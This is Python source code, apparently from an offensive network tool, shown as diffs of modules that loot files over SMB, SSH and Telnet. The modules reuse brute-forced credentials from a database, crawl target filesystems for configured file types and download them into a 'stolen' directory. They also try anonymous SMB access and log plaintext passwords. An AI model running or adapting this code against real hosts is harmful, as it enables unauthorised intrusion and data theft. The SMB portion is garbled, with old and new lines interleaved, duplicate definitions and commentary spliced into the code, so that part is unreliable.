def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# -------- Creds (grouped by share) --------
def _get_creds_by_share(self, ip: str, port: int) -> Dict[str, List[Tuple[str, str]]]:
"""
Establish an SMB connection.
Returns {share: [(user,pass), ...]} from DB.creds (service='smb', database=share).
Prefer IP; also include MAC if known. Dedup per share.
"""
mac = self.mac_for_ip(ip)
params = {"ip": ip, "port": port, "mac": mac or ""}
by_ip = self.shared_data.db.query(
"""
SELECT "user","password","database"
FROM creds
WHERE service='smb'
AND COALESCE(ip,'')=:ip
AND (port IS NULL OR port=:port)
""", params)
by_mac = []
if mac:
by_mac = self.shared_data.db.query(
"""
SELECT "user","password","database"
FROM creds
WHERE service='smb'
AND COALESCE(mac_address,'')=:mac
AND (port IS NULL OR port=:port)
""", params)
out: Dict[str, List[Tuple[str, str]]] = {}
seen: Dict[str, set] = {}
for row in (by_ip + by_mac):
share = str(row.get("database") or "").strip()
user = str(row.get("user") or "").strip()
pwd = str(row.get("password") or "").strip()
if not user or not share:
continue
if share not in out:
out[share], seen[share] = [], set()
if (user, pwd) in seen[share]:
continue
seen[share].add((user, pwd))
out[share].append((user, pwd))
return out
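The grouping above buckets credentials per share (stored in the `database` column) and dedups within each bucket. A pure-function sketch (name hypothetical):

```python
def group_creds_by_share(rows):
    """Group (user, password) by share (the 'database' column), deduping per share."""
    out, seen = {}, {}
    for row in rows:
        share = str(row.get("database") or "").strip()
        user = str(row.get("user") or "").strip()
        pwd = str(row.get("password") or "").strip()
        if not user or not share:
            continue  # rows without a user or share name are unusable
        pairs = seen.setdefault(share, set())
        if (user, pwd) in pairs:
            continue
        pairs.add((user, pwd))
        out.setdefault(share, []).append((user, pwd))
    return out
```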
# -------- SMB helpers --------
def connect_smb(self, ip: str, username: str, password: str) -> Optional[SMBConnection]:
try:
conn = SMBConnection(username, password, "Bjorn", "Target", use_ntlm_v2=True, is_direct_tcp=True)
conn.connect(ip, 445)
logger.info(f"Connected to {ip} via SMB with username {username}")
conn.connect(ip, b_port)
self.smb_connected = True
logger.info(f"Connected SMB {ip} as {username}")
return conn
except Exception as e:
logger.error(f"SMB connection error for {ip} with user '{username}' and password '{password}': {e}")
logger.error(f"SMB connect error {ip} {username}: {e}")
return None
def find_files(self, conn, share_name, dir_path):
"""
Find files in the SMB share based on the configuration criteria.
"""
files = []
try:
for file in conn.listPath(share_name, dir_path):
if file.isDirectory:
if file.filename not in ['.', '..']:
files.extend(self.find_files(conn, share_name, os.path.join(dir_path, file.filename)))
else:
if any(file.filename.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in file.filename for file_name in self.shared_data.steal_file_names):
files.append(os.path.join(dir_path, file.filename))
logger.info(f"Found {len(files)} matching files in {dir_path} on share {share_name}")
except Exception as e:
logger.error(f"Error accessing path {dir_path} in share {share_name}: {e}")
return files
def steal_file(self, conn, share_name, remote_file, local_dir):
"""
Download a file from the SMB share to the local directory.
"""
try:
local_file_path = os.path.join(local_dir, os.path.relpath(remote_file, '/'))
local_file_dir = os.path.dirname(local_file_path)
os.makedirs(local_file_dir, exist_ok=True)
with open(local_file_path, 'wb') as f:
conn.retrieveFile(share_name, remote_file, f)
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
except Exception as e:
logger.error(f"Error downloading file {remote_file} from share {share_name}: {e}")
def list_shares(self, conn):
"""
List shares using the SMBConnection object.
"""
def list_shares(self, conn: SMBConnection):
try:
shares = conn.listShares()
valid_shares = [share for share in shares if share.name not in IGNORED_SHARES and not share.isSpecial and not share.isTemporary]
logger.info(f"Found valid shares: {[share.name for share in valid_shares]}")
return valid_shares
return [s for s in shares if (s.name not in self.IGNORED_SHARES and not s.isSpecial and not s.isTemporary)]
except Exception as e:
logger.error(f"Error listing shares: {e}")
logger.error(f"list_shares error: {e}")
return []
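`list_shares()` drops administrative, special, and temporary shares before looting. A sketch of that filter, modeling shares as plain dicts rather than the `SMBConnection` share objects the real code receives (attribute names are assumptions):

```python
def filter_shares(shares, ignored):
    """Drop ignored, special, and temporary shares, as list_shares() does."""
    return [s for s in shares
            if s["name"] not in ignored
            and not s["is_special"]
            and not s["is_temporary"]]
```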
def execute(self, ip, port, row, status_key):
"""
Steal files from the SMB share.
"""
def find_files(self, conn: SMBConnection, share: str, dir_path: str) -> List[str]:
files: List[str] = []
try:
if 'success' in row.get(self.b_parent_action, ''): # Verify if the parent action is successful
self.shared_data.bjornorch_status = "StealFilesSMB"
logger.info(f"Stealing files from {ip}:{port}...")
# Wait a bit because it's too fast to see the status change
time.sleep(5)
# Get SMB credentials from the cracked passwords file
smbfile = self.shared_data.smbfile
credentials = {}
if os.path.exists(smbfile):
with open(smbfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
share = parts[3]
user = parts[4]
password = parts[5]
if share not in credentials:
credentials[share] = []
credentials[share].append((user, password))
logger.info(f"Found credentials for {len(credentials)} shares on {ip}")
def try_anonymous_access():
"""
Try to access SMB shares without credentials.
"""
try:
conn = self.connect_smb(ip, '', '')
shares = self.list_shares(conn)
return conn, shares
except Exception as e:
logger.info(f"Anonymous access to {ip} failed: {e}")
return None, None
if not credentials and not try_anonymous_access():
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def timeout():
"""
Timeout function to stop the execution if no SMB connection is established.
"""
if not self.smb_connected:
logger.error(f"No SMB connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, timeout) # 4 minutes timeout
timer.start()
# Attempt anonymous access first
success = False
conn, shares = try_anonymous_access()
if conn and shares:
for share in shares:
if share.isSpecial or share.isTemporary or share.name in IGNORED_SHARES:
continue
remote_files = self.find_files(conn, share.name, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"smb/{mac}_{ip}/{share.name}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution:
break
self.steal_file(conn, share.name, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} via anonymous access")
conn.close()
if success:
timer.cancel() # Cancel the timer if the operation is successful
# Track which shares have already been accessed anonymously
attempted_shares = {share.name for share in shares} if success else set()
# Attempt to steal files using each credential for shares not accessed anonymously
for share, creds in credentials.items():
if share in attempted_shares or share in IGNORED_SHARES:
continue
for username, password in creds:
if self.stop_execution:
break
try:
logger.info(f"Trying credential {username}:{password} for share {share} on {ip}")
conn = self.connect_smb(ip, username, password)
if conn:
remote_files = self.find_files(conn, share, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"smb/{mac}_{ip}/{share}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution:
break
self.steal_file(conn, share, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.info(f"Successfully stolen {countfiles} files from {ip}:{port} on share '{share}' with user '{username}'")
conn.close()
if success:
timer.cancel() # Cancel the timer if the operation is successful
break # Exit the loop as we have found valid credentials
except Exception as e:
logger.error(f"Error stealing files from {ip} on share '{share}' with user '{username}': {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
for entry in conn.listPath(share, dir_path):
if self.shared_data.orchestrator_should_exit or self.stop_execution:
logger.info("File search interrupted.")
return []
if entry.isDirectory:
if entry.filename not in ('.', '..'):
files.extend(self.find_files(conn, share, os.path.join(dir_path, entry.filename)))
else:
return 'success'
else:
logger.error(f"Parent action not successful for {ip}. Skipping steal files action.")
return 'failed'
name = entry.filename
if any(name.endswith(ext) for ext in (self.shared_data.steal_file_extensions or [])) or \
any(sn in name for sn in (self.shared_data.steal_file_names or [])):
files.append(os.path.join(dir_path, name))
return files
except Exception as e:
logger.error(f"SMB path error {share}:{dir_path}: {e}")
raise
def steal_file(self, conn: SMBConnection, share: str, remote_file: str, base_dir: str) -> None:
try:
local_file_path = os.path.join(base_dir, os.path.relpath(remote_file, '/'))
os.makedirs(os.path.dirname(local_file_path), exist_ok=True)
with open(local_file_path, 'wb') as f:
conn.retrieveFile(share, remote_file, f)
logger.success(f"Downloaded {share}:{remote_file} -> {local_file_path}")
except Exception as e:
logger.error(f"SMB download error {share}:{remote_file}: {e}")
# -------- Orchestrator entry --------
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
try:
self.shared_data.bjorn_orch_status = b_class
try:
port_i = int(port)
except Exception:
port_i = b_port
creds_by_share = self._get_creds_by_share(ip, port_i)
logger.info(f"Found SMB creds for {len(creds_by_share)} share(s) in DB for {ip}")
def _timeout():
if not self.smb_connected:
logger.error(f"No SMB connection within 4 minutes for {ip}. Failing.")
self.stop_execution = True
timer = Timer(240, _timeout)
timer.start()
mac = (row or {}).get("MAC Address") or self.mac_for_ip(ip) or "UNKNOWN"
success = False
# Anonymous first (''/'')
try:
conn = self.connect_smb(ip, '', '')
if conn:
shares = self.list_shares(conn)
for s in shares:
files = self.find_files(conn, s.name, '/')
if files:
base = os.path.join(self.shared_data.data_stolen_dir, f"smb/{mac}_{ip}/{s.name}")
for remote in files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
self.steal_file(conn, s.name, remote, base)
logger.success(f"Stole {len(files)} files from {ip} via anonymous on {s.name}")
success = True
try:
conn.close()
except Exception:
pass
except Exception as e:
logger.info(f"Anonymous SMB failed on {ip}: {e}")
if success:
timer.cancel()
return 'success'
# Per-share credentials
for share, creds in creds_by_share.items():
if share in self.IGNORED_SHARES:
continue
for username, password in creds:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
try:
conn = self.connect_smb(ip, username, password)
if not conn:
continue
files = self.find_files(conn, share, '/')
if files:
base = os.path.join(self.shared_data.data_stolen_dir, f"smb/{mac}_{ip}/{share}")
for remote in files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
self.steal_file(conn, share, remote, base)
logger.info(f"Stole {len(files)} files from {ip} share={share} as {username}")
success = True
try:
conn.close()
except Exception:
pass
if success:
timer.cancel()
return 'success'
except Exception as e:
logger.error(f"SMB loot error {ip} {share} {username}: {e}")
timer.cancel()
return 'success' if success else 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_smb = StealFilesSMB(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")

@@ -1,173 +1,356 @@
"""
steal_files_ssh.py - This script connects to remote SSH servers using provided credentials, searches for specific files, and downloads them to a local directory.
steal_files_ssh.py — SSH file looter (DB-backed)
SQL mode:
- Orchestrator provides (ip, port) and ensures parent action success (SSHBruteforce).
- SSH credentials are read from the DB table `creds` (service='ssh').
- IP -> (MAC, hostname) mapping is read from the DB table `hosts`.
- Looted files are saved under: {shared_data.data_stolen_dir}/ssh/{mac}_{ip}/...
- Paramiko logs are silenced to avoid noisy banners/tracebacks.
Parent gate:
- Orchestrator enforces parent success (b_parent='SSHBruteforce').
- This action runs once per eligible target (alive, open port, parent OK).
"""
import os
import paramiko
import logging
import time
from rich.console import Console
import logging
import paramiko
from threading import Timer
from typing import List, Tuple, Dict, Optional
from shared import SharedData
from logger import Logger
# Configure the logger
# Logger for this module
logger = Logger(name="steal_files_ssh.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesSSH"
b_module = "steal_files_ssh"
b_status = "steal_files_ssh"
b_parent = "SSHBruteforce"
b_port = 22
# Silence Paramiko's internal logs (no "Error reading SSH protocol banner" spam)
for _name in ("paramiko", "paramiko.transport", "paramiko.client", "paramiko.hostkeys"):
logging.getLogger(_name).setLevel(logging.CRITICAL)
b_class = "StealFilesSSH" # Unique action identifier
b_module = "steal_files_ssh" # Python module name (this file without .py)
b_status = "steal_files_ssh" # Human/readable status key (free form)
b_action = "normal" # 'normal' (per-host) or 'global'
b_service = ["ssh"] # Services this action is about (JSON-ified by sync_actions)
b_port = 22 # Preferred target port (used if present on host)
# Trigger strategy:
# - Prefer to run as soon as SSH credentials exist for this MAC (on_cred_found:ssh).
# - Also allow starting when the host exposes SSH (on_service:ssh),
# but the requirements below still enforce that SSH creds must be present.
b_trigger = 'on_any:["on_cred_found:ssh","on_service:ssh"]'
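The `b_trigger` string above uses a small `mode:[events]` notation. A minimal sketch of how an orchestrator might parse it; the helper name and the exact grammar are assumptions for illustration, not part of this repo:

```python
import json

def parse_trigger(spec: str):
    # Hypothetical parser for the trigger notation used above.
    # 'on_any:[...]' / 'on_all:[...]' carry a JSON list of events;
    # a bare event string is treated as a single mandatory event.
    head = spec.split(':', 1)[0]
    if ':' in spec and head in ('on_any', 'on_all'):
        mode, payload = spec.split(':', 1)
        return mode, json.loads(payload)
    return 'on_all', [spec]

mode, events = parse_trigger('on_any:["on_cred_found:ssh","on_service:ssh"]')
# mode == 'on_any'; events == ['on_cred_found:ssh', 'on_service:ssh']
```

Note that splitting only on the first `:` keeps event names like `on_cred_found:ssh` intact inside the JSON payload.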
# Requirements (JSON string):
# - must have SSH credentials on this MAC
# - must have port 22 (legacy fallback if port_services is missing)
# - limit concurrent running actions system-wide to 2 for safety
b_requires = '{"all":[{"has_cred":"ssh"},{"has_port":22},{"max_concurrent":2}]}'
# Scheduling / limits
b_priority = 70 # 0..100 (higher processed first in this schema)
b_timeout = 900 # seconds before a pending queue item expires
b_max_retries = 1 # minimal retries; avoid noisy re-runs
b_cooldown = 86400 # seconds (per-host cooldown between runs)
b_rate_limit = "3/86400" # at most 3 executions/day per host (extra guard)
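The `"3/86400"` rate-limit string reads as "at most 3 runs per 86400-second window". A minimal sketch of parsing and checking it against past run timestamps; the format interpretation comes from the comment above, and the helper names are illustrative, not a documented API of this repo:

```python
import time

def parse_rate_limit(spec: str):
    # "3/86400" -> (3 runs, per 86400-second window).
    count, _, window = spec.partition('/')
    return int(count), int(window)

def within_rate_limit(spec: str, run_timestamps, now=None) -> bool:
    # True if another run is still allowed inside the sliding window.
    max_runs, window = parse_rate_limit(spec)
    now = time.time() if now is None else now
    recent = [t for t in run_timestamps if now - t < window]
    return len(recent) < max_runs
```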
# Risk / hygiene
b_stealth_level = 6 # 1..10 (higher = more stealthy)
b_risk_level = "high" # 'low' | 'medium' | 'high'
b_enabled = 1 # set to 0 to disable from DB sync
# Tags (free taxonomy, JSON-ified by sync_actions)
b_tags = ["exfil", "ssh", "loot"]
class StealFilesSSH:
"""
Class to handle the process of stealing files from SSH servers.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.sftp_connected = False
self.stop_execution = False
logger.info("StealFilesSSH initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
"""StealFilesSSH: connects via SSH using known creds and downloads matching files."""
def connect_ssh(self, ip, username, password):
"""
Establish an SSH connection.
"""
try:
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(ip, username=username, password=password)
logger.info(f"Connected to {ip} via SSH with username {username}")
return ssh
except Exception as e:
logger.error(f"Error connecting to SSH on {ip} with username {username}: {e}")
raise
def __init__(self, shared_data: SharedData):
"""Init: store shared_data, flags, and build an IP->(MAC, hostname) cache."""
self.shared_data = shared_data
self.sftp_connected = False # flipped to True on first SFTP open
self.stop_execution = False # global kill switch (timer / orchestrator exit)
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
logger.info("StealFilesSSH initialized")
def find_files(self, ssh, dir_path):
"""
Find files in the remote directory based on the configuration criteria.
"""
try:
stdin, stdout, stderr = ssh.exec_command(f'find {dir_path} -type f')
files = stdout.read().decode().splitlines()
matching_files = []
for file in files:
if self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted.")
return []
if any(file.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in file for file_name in self.shared_data.steal_file_names):
matching_files.append(file)
logger.info(f"Found {len(matching_files)} matching files in {dir_path}")
return matching_files
except Exception as e:
logger.error(f"Error finding files in directory {dir_path}: {e}")
raise
# --------------------- Identity cache (hosts) ---------------------
def steal_file(self, ssh, remote_file, local_dir):
"""
Download a file from the remote server to the local directory.
"""
def _refresh_ip_identity_cache(self) -> None:
"""Rebuild IP -> (MAC, current_hostname) from DB.hosts."""
self._ip_to_identity.clear()
try:
sftp = ssh.open_sftp()
self.sftp_connected = True # Mark SFTP as connected
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
"""Return MAC for IP using the local cache (refresh on miss)."""
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
"""Return current hostname for IP using the local cache (refresh on miss)."""
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# --------------------- Credentials (creds table) ---------------------
def _get_creds_for_target(self, ip: str, port: int) -> List[Tuple[str, str]]:
"""
Fetch SSH creds for this target from DB.creds.
Strategy:
- Prefer rows where service='ssh' AND ip=target_ip AND (port is NULL or matches).
- Also include rows for same MAC (if known), still service='ssh'.
Returns list of (username, password), deduplicated.
"""
mac = self.mac_for_ip(ip)
params = {"ip": ip, "port": port, "mac": mac or ""}
# Pull by IP
by_ip = self.shared_data.db.query(
"""
SELECT "user", "password"
FROM creds
WHERE service='ssh'
AND COALESCE(ip,'') = :ip
AND (port IS NULL OR port = :port)
""",
params
)
# Pull by MAC (if we have one)
by_mac = []
if mac:
by_mac = self.shared_data.db.query(
"""
SELECT "user", "password"
FROM creds
WHERE service='ssh'
AND COALESCE(mac_address,'') = :mac
AND (port IS NULL OR port = :port)
""",
params
)
# Deduplicate while preserving order
seen = set()
out: List[Tuple[str, str]] = []
for row in (by_ip + by_mac):
u = str(row.get("user") or "").strip()
p = str(row.get("password") or "").strip()
if not u or (u, p) in seen:
continue
seen.add((u, p))
out.append((u, p))
return out
# --------------------- SSH helpers ---------------------
def connect_ssh(self, ip: str, username: str, password: str, port: int = b_port, timeout: int = 10):
"""
Open an SSH connection (no agent, no keys). Returns an active SSHClient or raises.
NOTE: Paramiko logs are silenced at module import level.
"""
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# Be explicit: no interactive agents/keys; bounded timeouts to avoid hangs
ssh.connect(
hostname=ip,
username=username,
password=password,
port=port,
timeout=timeout,
auth_timeout=timeout,
banner_timeout=timeout,
allow_agent=False,
look_for_keys=False,
)
logger.info(f"Connected to {ip} via SSH as {username}")
return ssh
def find_files(self, ssh: paramiko.SSHClient, dir_path: str) -> List[str]:
"""
List candidate files from remote dir, filtered by config:
- shared_data.steal_file_extensions (endswith)
- shared_data.steal_file_names (substring match)
Uses `find <dir> -type f 2>/dev/null` to keep it quiet.
"""
# Quiet 'permission denied' messages via redirection
cmd = f'find {dir_path} -type f 2>/dev/null'
stdin, stdout, stderr = ssh.exec_command(cmd)
files = (stdout.read().decode(errors="ignore") or "").splitlines()
exts = set(self.shared_data.steal_file_extensions or [])
names = set(self.shared_data.steal_file_names or [])
if not exts and not names:
# If no filters are defined, do nothing (too risky to pull everything).
logger.warning("No steal_file_extensions / steal_file_names configured — skipping.")
return []
matches: List[str] = []
for fpath in files:
if self.shared_data.orchestrator_should_exit or self.stop_execution:
logger.info("File search interrupted.")
return []
fname = os.path.basename(fpath)
if (exts and any(fname.endswith(ext) for ext in exts)) or (names and any(sn in fname for sn in names)):
matches.append(fpath)
logger.info(f"Found {len(matches)} matching files in {dir_path}")
return matches
# Max file size to download (10 MB) — protects RPi Zero RAM
_MAX_FILE_SIZE = 10 * 1024 * 1024
def steal_file(self, ssh: paramiko.SSHClient, remote_file: str, local_dir: str) -> None:
"""
Download a single remote file into the given local dir, preserving subdirs.
Skips files larger than _MAX_FILE_SIZE to protect RPi Zero memory.
"""
sftp = ssh.open_sftp()
self.sftp_connected = True # first time we open SFTP, mark as connected
try:
# Check file size before downloading
try:
st = sftp.stat(remote_file)
if st.st_size and st.st_size > self._MAX_FILE_SIZE:
logger.info(f"Skipping {remote_file} ({st.st_size} bytes > {self._MAX_FILE_SIZE} limit)")
return
except Exception:
pass # stat failed, try download anyway
# Preserve partial directory structure under local_dir
remote_dir = os.path.dirname(remote_file)
local_file_dir = os.path.join(local_dir, os.path.relpath(remote_dir, '/'))
os.makedirs(local_file_dir, exist_ok=True)
local_file_path = os.path.join(local_file_dir, os.path.basename(remote_file))
sftp.get(remote_file, local_file_path)
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
sftp.close()
except Exception as e:
logger.error(f"Error stealing file {remote_file}: {e}")
raise
def execute(self, ip, port, row, status_key):
logger.success(f"Downloaded: {remote_file} -> {local_file_path}")
finally:
try:
sftp.close()
except Exception:
pass
# --------------------- Orchestrator entrypoint ---------------------
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
"""
Steal files from the remote server using SSH.
Orchestrator entrypoint (signature preserved):
- ip: target IP
- port: str (expected '22')
- row: current target row (compat structure built by shared_data)
- status_key: action name (b_class)
Returns 'success' if at least one file stolen; else 'failed'.
"""
timer = None
try:
if 'success' in row.get(self.b_parent_action, ''): # Verify if the parent action is successful
self.shared_data.bjornorch_status = "StealFilesSSH"
# Wait a bit because it's too fast to see the status change
time.sleep(5)
logger.info(f"Stealing files from {ip}:{port}...")
self.shared_data.bjorn_orch_status = b_class
# Get SSH credentials from the cracked passwords file
sshfile = self.shared_data.sshfile
credentials = []
if os.path.exists(sshfile):
with open(sshfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
credentials.append((parts[3], parts[4]))
logger.info(f"Found {len(credentials)} credentials for {ip}")
# Gather credentials from DB
try:
port_i = int(port)
except Exception:
port_i = b_port
if not credentials:
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
hostname = self.hostname_for_ip(ip) or ""
self.shared_data.comment_params = {"ip": ip, "port": str(port_i), "hostname": hostname}
def timeout():
"""
Timeout function to stop the execution if no SFTP connection is established.
"""
if not self.sftp_connected:
logger.error(f"No SFTP connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, timeout) # 4 minutes timeout
timer.start()
# Attempt to steal files using each credential
success = False
for username, password in credentials:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted.")
break
try:
logger.info(f"Trying credential {username}:{password} for {ip}")
ssh = self.connect_ssh(ip, username, password)
remote_files = self.find_files(ssh, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"ssh/{mac}_{ip}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted.")
break
self.steal_file(ssh, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} using {username}")
ssh.close()
if success:
timer.cancel() # Cancel the timer if the operation is successful
return 'success' # Return success if the operation is successful
except Exception as e:
logger.error(f"Error stealing files from {ip} with username {username}: {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
logger.error(f"Parent action not successful for {ip}. Skipping steal files action.")
creds = self._get_creds_for_target(ip, port_i)
logger.info(f"Found {len(creds)} SSH credentials in DB for {ip}")
if not creds:
logger.error(f"No SSH credentials for {ip}. Skipping.")
return 'failed'
# Define a timer: if we never establish SFTP in 4 minutes, abort
def _timeout():
if not self.sftp_connected:
logger.error(f"No SFTP connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, _timeout)
timer.start()
# Identify where to save loot
mac = (row or {}).get("MAC Address") or self.mac_for_ip(ip) or "UNKNOWN"
base_dir = os.path.join(self.shared_data.data_stolen_dir, f"ssh/{mac}_{ip}")
# Try each credential until success (or interrupted)
success_any = False
for username, password in creds:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
try:
self.shared_data.comment_params = {"user": username, "ip": ip, "port": str(port_i), "hostname": hostname}
logger.info(f"Trying credential {username} for {ip}")
ssh = self.connect_ssh(ip, username, password, port=port_i)
# Search from root; filtered by config
files = self.find_files(ssh, '/')
if files:
self.shared_data.comment_params = {"user": username, "ip": ip, "port": str(port_i), "hostname": hostname, "files": str(len(files))}
for remote in files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted during download.")
break
self.steal_file(ssh, remote, base_dir)
logger.success(f"Successfully stole {len(files)} files from {ip}:{port_i} as {username}")
success_any = True
try:
ssh.close()
except Exception:
pass
if success_any:
break # one successful cred is enough
except Exception as e:
# Stay quiet on Paramiko internals; just log the reason and try next cred
logger.error(f"SSH loot attempt failed on {ip} with {username}: {e}")
return 'success' if success_any else 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
finally:
if timer:
timer.cancel()
if __name__ == "__main__":
# Minimal smoke test if run standalone (not used in production; orchestrator calls execute()).
try:
shared_data = SharedData()
steal_files_ssh = StealFilesSSH(shared_data)
# Add test or demonstration calls here
sd = SharedData()
action = StealFilesSSH(sd)
# Example (replace with a real IP that has creds in DB):
# result = action.execute("192.168.1.10", "22", {"MAC Address": "AA:BB:CC:DD:EE:FF"}, b_status)
# print("Result:", result)
except Exception as e:
logger.error(f"Error in main execution: {e}")

@@ -1,180 +1,218 @@
"""
steal_files_telnet.py - This script connects to remote Telnet servers using provided credentials, searches for specific files, and downloads them to a local directory.
steal_files_telnet.py — Telnet file looter (DB-backed)
SQL mode:
- Orchestrator provides (ip, port) after parent success (TelnetBruteforce).
- Credentials read from DB.creds (service='telnet'); we try each pair.
- Files found via 'find / -type f', then retrieved with 'cat'.
- Output under: {data_stolen_dir}/telnet/{mac}_{ip}/...
"""
import os
import telnetlib
import logging
import time
from rich.console import Console
from threading import Timer
from typing import List, Tuple, Dict, Optional
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_telnet.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesTelnet"
b_class = "StealFilesTelnet"
b_module = "steal_files_telnet"
b_status = "steal_files_telnet"
b_parent = "TelnetBruteforce"
b_port = 23
b_port = 23
class StealFilesTelnet:
"""
Class to handle the process of stealing files from Telnet servers.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.telnet_connected = False
self.stop_execution = False
logger.info("StealFilesTelnet initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self.telnet_connected = False
self.stop_execution = False
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
logger.info("StealFilesTelnet initialized")
def connect_telnet(self, ip, username, password):
"""
Establish a Telnet connection.
"""
# -------- Identity cache --------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
tn = telnetlib.Telnet(ip)
tn.read_until(b"login: ")
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# -------- Creds --------
def _get_creds_for_target(self, ip: str, port: int) -> List[Tuple[str, str]]:
mac = self.mac_for_ip(ip)
params = {"ip": ip, "port": port, "mac": mac or ""}
by_ip = self.shared_data.db.query(
"""
SELECT "user","password"
FROM creds
WHERE service='telnet'
AND COALESCE(ip,'')=:ip
AND (port IS NULL OR port=:port)
""", params)
by_mac = []
if mac:
by_mac = self.shared_data.db.query(
"""
SELECT "user","password"
FROM creds
WHERE service='telnet'
AND COALESCE(mac_address,'')=:mac
AND (port IS NULL OR port=:port)
""", params)
seen, out = set(), []
for row in (by_ip + by_mac):
u = str(row.get("user") or "").strip()
p = str(row.get("password") or "").strip()
if not u or (u, p) in seen:
continue
seen.add((u, p))
out.append((u, p))
return out
# -------- Telnet helpers --------
def connect_telnet(self, ip: str, username: str, password: str) -> Optional[telnetlib.Telnet]:
try:
tn = telnetlib.Telnet(ip, b_port, timeout=10)
tn.read_until(b"login: ", timeout=5)
tn.write(username.encode('ascii') + b"\n")
if password:
tn.read_until(b"Password: ")
tn.read_until(b"Password: ", timeout=5)
tn.write(password.encode('ascii') + b"\n")
